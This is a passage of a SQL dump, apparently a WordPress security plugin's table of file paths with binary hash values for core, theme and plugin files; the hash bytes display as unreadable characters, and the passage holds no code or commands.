E��Xz�ԋע�Fo�5خ��h','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('�yA��>�WXM�.hr7','wp-content/themes/weblog/acmethemes/customizer/header-options/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���63�����Pd��','�G1����^����SX�^���Ͳ��N��','',0,'?'),('�P;_cv����Y`Ƈ','wp-includes/wp-includes/SimplePie/Item.php',0,'-ߟ�� �8����1�V','-ߟ�� �8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('�r��>�JR�Kk�j�','wp-includes/wp-includes/images/crystal/archive.png',0,'�S����I0An�','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('�y�%@�}H��;,#','wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php',0,'y�$+��q?��U��','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o#^�&jjG�MYI�','��+�v��G2-�g�\r��Q�-����UA�','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('�Ӏ�}�i���?�','wp-content/themes/travel-stories/images/strelka_left_dark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��\\ح��R�;XM�','����q9���֯��/��b�V�:�;���/g}','',0,'?'),('��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I �','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�ϋOny&��-���n',',�#�]�d���!�I|�4<�n�ނ�r\0,�','',0,'?'),('��LuZ;�@�Z���b�','wp-includes/wp-includes/ms-settings.php',0,'Ĉ�L�@�r#�}S���','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/ �','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��]�#{P�B�&{�Ƿ','wp-includes/wp-includes/js/wp-embed-template.js',0,'�lq3UN�:�9�:^E��','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('���cq6���Ǩ߮','wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js',0,'@J��x&H�*8�����.','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('���p�I�P�3�Q','wp-content/themes/spidermag/assets/js/media-uploader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H;����ESVi�2','�/�d��r_��w\r�c��+�χs�\0G;\n/�','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�.�ʹ��g�','\"�e۰�}�)�s��ѓʫt[�\"�i����/V�','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~^_��\r}��V_�)x','�?l�;�t�F|t�9u�����.&{Y,A��','',0,'?'),('�Q��א�4����B|�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',0,'��a5q��ȑ_4�@','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�]��Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�c�E%D��� ��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('�rfr�\0��mk|B<�','wp-content/themes/spidermag/assets/library/animate/css/animate.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&�fѤTG�X��TP','\'W!M��n�\'lw3]�G@T?�����9� �','',0,'?'),('�vqy=���2�\0��-�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w!fTǦ˝�`','?\r��\01re��, � �PVw�%�\0�X','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cqw=��*c�$[�','�6V�s4�s=T���,�ˇ4{w��m��z','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('�,ၗ����ѹe�)','wp-content/themes/fastblog/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\\�ʤ����d�6','��1�U@�H���C�Q���{q��=c�uP����Z','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����k�dɐʎs','L�$0��霕A��]`��H�X\" ���q4�\'','',0,'?'),('�Qq^��&�\'����|�','wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php',0,'��x̭&�b�+|eS�݂','��x̭&�b�+|eS�݂','�,��ɼ?��?� p�f\0qO��_���&N9','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('�<l��$�ۣ��i3�','wp-content/themes/hueman/parts/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HGE\"�v�q�}>�7��^','S�Q > ���R#�j�\"�|�ω`�ou�K�F','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('��T?I�`x\0�o���','wp-content/themes/auberge/template-parts/menu-primary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���``��K�3��','sW���(���k嘨�h�0���|��\"�SA8','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʝ��\'��dwgZ�|�','b!��&f�a�u���Lqm<.�ќ3/X�c�[','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r� S[l��','',0,'?'),('�D�!T��8�f@�','wp-content/themes/maxbusiness/template-parts/home-services.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X���\n��zIl�','�- `-^�.�RIbzU�z���\\o�ˎS�Ա�','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('�\\�4*կJޓ.�]T=','wp-content/themes/auberge/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,<��\"C���ze%3�','�%���j�A���\ZP\"���\Zagn��\'nȳ','',0,'?'),('��S��eT �n\r','wp-content/themes/sg-window/img/icons/small/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m������lo/���','�J+�6�b�`�^��i���?��!E�DgE�S�F','',0,'?'),('3p�=�Ym�}�ۑ','wp-includes/wp-includes/default-filters.php',0,'���=��B/˥oH:z','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')TL��\\5�\0Rq`��','W��r�qlR!X;��G?��>F�Ň�����u�','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�zZ�f���ip^�2','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+ M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T ��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('�Q��4��Y�,Q','wp-content/themes/hueman/functions/widgets/alx-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��$�����',';NNc�\\��څ)�����]�ĕs��{�@iz���','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('��(k��~E\0H\0�Cg','wp-includes/wp-includes/class-json.php',0,'kE\Z�[Z����䰱�','kE\Z�[Z����䰱�','�D����t��5��^ �σ�7�2��7�{','',0,'?'),('���c��� ��ˆ�L','wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/class-widget-newsmag-posts_list_horizontal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�6t�-+\n�_hʚwx','�3����ѣ��=Yv\Zh*�j�`e�\0�4�','',0,'?'),('��U��.2ث�GU�h�','wp-content/themes/kidzoo-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�����n&���','��W=�����Up̀T+NI71��ʶ\ryz��$�K�','',0,'?'),('��h��2���\n\'�1S','wp-content/themes/shopone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-M�1C������KP','4z?x�L�E���!��,d�ɂ�m���0�E��V','',0,'?'),('�棭s�� t�yg)�','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php',0,'�@Bg�EJ�ƽH�','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('�\0�d:c\Z6}����e','wp-includes/wp-includes/css/admin-bar.min.css',0,'L�7w��R��«���','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('��:k^R�4�>A�g�','wp-includes/wp-includes/js/dist/autop.min.js',0,'��# 狌6�Qq<6','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('��#���rj����c9&','wp-content/themes/promote/inc/kirki/includes/class-kirki-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�Ău#��Y���%','h�(��F\\��.�v���\\�p������}�','',0,'?'),('�Q6�3���x�','wp-content/themes/kidzoo-lite/sass/base/_placeholders.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#G�b��T��I','�M�e�W��tW\'��j����.�(�X�','',0,'?'),('�!�(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����) ','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I gƅ\Z:���','|�N5ȩ*͟��h7j�.�x���}�ʗ����','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n � ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�PNmX`�.s�\ZO�\n^','wp-content/themes/event/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ����\"!�_�t�W','CU^y�\n�F�m5 �v�$�ܐ�8��>c���','',0,'?'),('�Y� 3հ-겧�Y�','wp-content/themes/storeone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GrS}ˇ4�1qz�N�','c%�_䱿�g���¸��u��\r*�rn&*�@�q�','',0,'?'),('�k�q1��X�\n�0e[','wp-content/themes/weblog/acmethemes/hooks/social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�DՑ���?��B4�','Gyd�s�ƾ�_h |-\\1�%ǝƿ����~�','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J �A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�{ܶ��a7��K#��h','wp-content/themes/wp-barrister/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�6C�j��c[G��$9�','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j\'�~?2��]�g�Z','�c<*WB!�,�5\ZTQEF�#��h_a�~�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^ ','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('����[���q�b�}/��','wp-content/themes/hueman/functions/czr/czr-resources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'+X8�::�T��p��','���5�Ю;���6���E��+�v:�\Zе','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N �S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('���� �6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[ $3','',0,'?'),('��G��X2k�d>��i','wp-content/themes/capacious/inc/hooks/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�=.3��j����p�','�ɸ<H�`Ʈ�:��HW�٦�KF�Řp�6{ZU�','',0,'?'),('��禦��z���b%*�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��8�RR��J���','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('���\'�-�dG��˻`','wp-content/themes/Yegor/inc/template-tags.php',0,'����n�j+ñ�/�','����n�j+ñ�/�','Uv�����q$Z@I=>������`�]�܍%','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('����cs,\Z����','wp-content/themes/newsmag/assets/images/picture_placeholder.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`+�#j���|�������','識R����0��L�Q)� �8�;�0��hk','',0,'?'),('�\r�B�Uҕ�H���v�','wp-includes/wp-includes/js/dist/block-directory.js',0,':-��q���?b�^�',':-��q���?b�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ�P�G�B���$��� �JE3�n^�','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(��','',0,'?'),('�$]�5�f\'Û�|�lV','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AS�7(VĨ��6�','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('�$�ş a0����','wp-includes/wp-includes/class-walker-page-dropdown.php',0,'�tB�B2�[eJ��5�a','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('�\'�*��P��*5��o�','wp-includes/wp-includes/class-wp-rewrite.php',0,'�c���x�X��C��u%#','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�3�)11�ݖ�x̯\"�','wp-content/themes/storeone/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I�yfM|��P۵/','�|�>*i٢2\'E��|��Gj��$KpUJ�ʘ','',0,'?'),('�6ҹtyԥGЁ��','wp-includes/wp-includes/css/editor-rtl.css',0,'b��d�(�*ț��K��','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�9ٶ(mW�D���R','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryAnimateSvg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rm��\'����2��tu','�]t;���\"���z�i�_���,��J�`.�;W�5','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�\n�.[�%�','\Zw<��>��s-��ӆd��@D�>f�\"�3','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�: ڂa�7��Zcdm��%','',0,'?'),('�V��w��?4I�HE','wp-content/themes/anima/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y����+TbxCY^�','�=�uDɚ�����3];��Ȇ͝2�¶','',0,'?'),('�o�w1�k;ӗ`���','wp-includes/wp-includes/js/tw-sack.min.js',0,'�7�X��wO��qa','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('��>�.�X���C���`�','wp-content/themes/newsmag/assets/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e��P5o��I�','��ӭ����;8�q�4|T]P��B�ɨ�b�7?','',0,'?'),('��1X�e!;sn�˦i','wp-content/themes/maxbusiness/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nج��qT2¥','��/��� J�*!�.���n+�k~�sD�b�6#e','',0,'?'),('��K�o��?��%o�-P�','wp-content/themes/anima/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���\0����E�v�+','�Q�ja��M��Y��`j%H9hS�r�=�F�','',0,'?'),('��of�w0��@�N\Z8','wp-content/themes/Kent/ft-options.php',0,'���W�5I��h��K�','���W�5I��h��K�','�2�:��&��7i�|���^�g�X�.�s��','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���<�ِ�J��D��','�#�[�\Z*\n�L���=I�Dwguwd��,�\'�IE?�','',0,'?'),('����nΞ3�Z���','wp-content/themes/skt-pathway/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('���k��7l�lۄa�B','wp-includes/wp-includes/css/dist/format-library/style-rtl.css',0,'�6���F۔�\'�V��','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�瑥���\n��bk\0�q','��\n �U����y���A��80CĆ���6$3','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3� {��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('���H�����\0\"��','wp-content/themes/spidermag/spidermag/customwidget/widget-sixthblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','қ߂ħ$P�1����','�-+�&����v��t�YᢤgW���E^k@K','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 �ʚ�7w3K��*','5 